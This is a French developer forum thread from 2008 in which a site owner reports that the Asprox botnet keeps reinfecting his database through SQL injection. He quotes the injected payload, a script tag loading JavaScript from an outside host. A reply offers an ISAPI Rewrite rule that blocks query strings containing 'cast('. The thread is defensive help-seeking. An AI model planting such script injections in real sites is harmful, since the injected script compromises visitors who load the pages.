Injection SQL - ASPROX BOTNET - Système / Sécurité, ASP / ASP.NET

CodeS-SourceS est hébergé par Frontier.fr

Ce site au démarrage

AccueilCodesTutorielsForumsEmploiLivresGuide achatConnexion

begin process at 2009 07 05 04:57:31

SILVERLIGHT 3 : COMMUNICATION ET MULTICAST par KooKiz

[PERSO] DéCOUVERTES ESTIVALES : LINUX (PART I) par FREMYCOMPANY

[REFACTORING] RESHARPER POUR VISUAL STUDIO 2010 (PREVIEW) par tja

[REFACTORING] ANALYSER VOS EXCEPTIONS AVEC RESHARPER EXCEPTIONAL par tja

SHAREPOINT 2007 : PATTERNS & PRACTICES SHAREPOINT GUIDANCE par phil

RE : INTERNET EXPLOREUR 8,RESTREINTE DE L'EXECUTION DES SCRIPTS OU DES CONTRôLES ACTIVESX par ghuysmans99

INTERNET EXPLOREUR 8,RESTREINTE DE L'EXECUTION DES SCRIPTS OU DES CONTRôLES ACTIVESX par cool26

SOMME DANS TEXTBOX par benamb

RE : SELECTIONNER UN éLEMENT UNIQUE DANS UNE DROPDOWNLIST par ggtry

MVC PROBLEME VIEWDATA / BEGINFORM par WiDOC

+ de logiciels à télécharger

1 464 545 membres
51 nouveaux aujourd'hui
15 045 membres club

Trouver une ressource

Trouvez une ressource parmi 40 096 codes, 1 302 919 messages d'aide etc...

Recherche: dans [ Dernières recherches ]

Filtre:Tous les codes.NET uniquementExclure .NET

Vous ne trouvez pas de réponse à votre problème ? Alors posez la question dans le forum. Souvenez-vous qu'il n'y a jamais de question bête, mais rester dans l'ignorance parce que l'on n'ose pas poser une question, ça c'est une erreur !

Poser une question

Sujet : Injection SQL - ASPROX BOTNET [ Système / Sécurité ] (tbbuim1)

Informations & options pour cette discussion

Vous êtes ici : Thèmes / ASP / ASP3 / Système / Sécurité / Injection SQL - ASPROX BOTNET
Ce sujet vous interesse ? Cliquez ici pour être averti quand il y a une nouvelle réponse

lundi 2 juin 2008 à 16:24:32 | Injection SQL - ASPROX BOTNET

tbbuim1

Bonjour à tous,

Comme des millions de serveurs dans le monde, mon serveur est attaqué par des injections de SQL : du style
<script src=http://www.redir94.com/b.js></script>
à l'intérieur de mes champs dans la base de données.

voir
http://www.authsecu.com/news/315-news-securite-entreprise-renouveau-des-attaques-par-injection-sql-selon-ibm.htm
http://www.matchent.com/wpress/?q=node/309
http://www.eweek.com/c/a/Security/Botnet-Installs-SQL-Injection-Tool/

J'ai contrôlé les rq et mis une fonction anti injection pour chaque rq pouvant être attaquées, mais rien n'y fait. fonction : Fn_NoSqlInject

j'ai fait la recherche du trojan msscntr32.exe mais je ne l'ai pas trouvé.

Bref, mon site est continuellement attaqué et j'ai beau enlever les lignes de la table qui sont infectées, elles se réinfectent tous les jours.

Quelqu'un a une idée?

Merci pour votre aide

TBBUIM

mercredi 11 juin 2008 à 10:16:46 | Re : Injection SQL - ASPROX BOTNET

TompouceTN

Bonjour,

J'ai eu le même soucis pendant quelques jours.
Pour me débarrasser des attaques, j'ai utilisé une règle de réécriture (avec ISAPI Rewrite), demandant de stopper le chargement de la page si on détecte "cast(" dans le querystring.

RewriteRule .*CAST\(.* . [F,I]

Depuis, plus de soucis.

Cela n'empèche pas de sécuriser au maximum les requètes. Chez moi aussi, il y avait du boulot... certaines pages étant écrites depuis presque 10 ans... !

Bon courage
Tom

Cette discussion est classé dans : sql, www, injection, botnet, com

Répondre à ce message

Sujets en rapport avec ce message

Probleme SQL [ par yoyo ] Mon pb ne concerne pas directement ASP mais je suppose queqq'un pourra m'aider.La requete suivante est executee sur un serveur SQLServer 7.SELECT * FR Probleme avec SQL SERVER [ par valou ] salut,j'ai un probleme pour une requete en asp sur sql server.voici mon code:Set conn = Server.CreateObject("ADODB.Connection")connstring = "driver={S SQL SERVER 2000 ???? connection [ par Troyan ] j'ai toujours systematiquement la meme erreur.cela doit etre un parametrage de SQL2K mais j'ai pas trouvé !!Help Échec de la connexion de l'utilisateu SQL Requete [ par ZL ] j'ai une table, nommée T1 qui contient 5 enregistrements,par exemple,1,2,3,4,5;j'ai une autre table,nommée T2 qui contient 2 enregistrements,par exemp Transfert de donnees entre 2 BD SQL Server 2000! [ par ludo ] Bonjour, j ai un leger pb!Voila j ai deux bases de donnees SQL server 2000. Je veux recuperer certaines donnees d une ou +sieur tables d une BD et les probleme SQL ??? ou variable ASP??? [ par peguman ] Je souhaite me connecter à une base après vérification de l'identité d'un client...Je passe en parametre le log et le pass et je les vérifies dans ma Erreur sur requête SQL dans page ASP ... [ par IF ] Voilà, je lutte sur un petit problème, je ne comprends pas d'où vient l'erreur dans la requête SQL suivante :----------------------------------------- Probleme de requete ASP-SQL [ par peguman ] lors d'un e requete SQL d'insertion dans une table, l'erreur suivante apparait : ADODB.Field erreur '800a0cb3' L'opération demandée par l'application Requete sql asp [ par seb ] voila j'ai un tout petit problèmeJ'ai une requete asp qui fonctionnne sur les critère en chaine de caractère mais lorsque je souhaite réaliser mon cri requete sql asp [ par seb ] Pourquoi je n'arrive pas a créer ma requete select sur un critère numauto qui est mon identifiant de ma table access.login est un request.from du form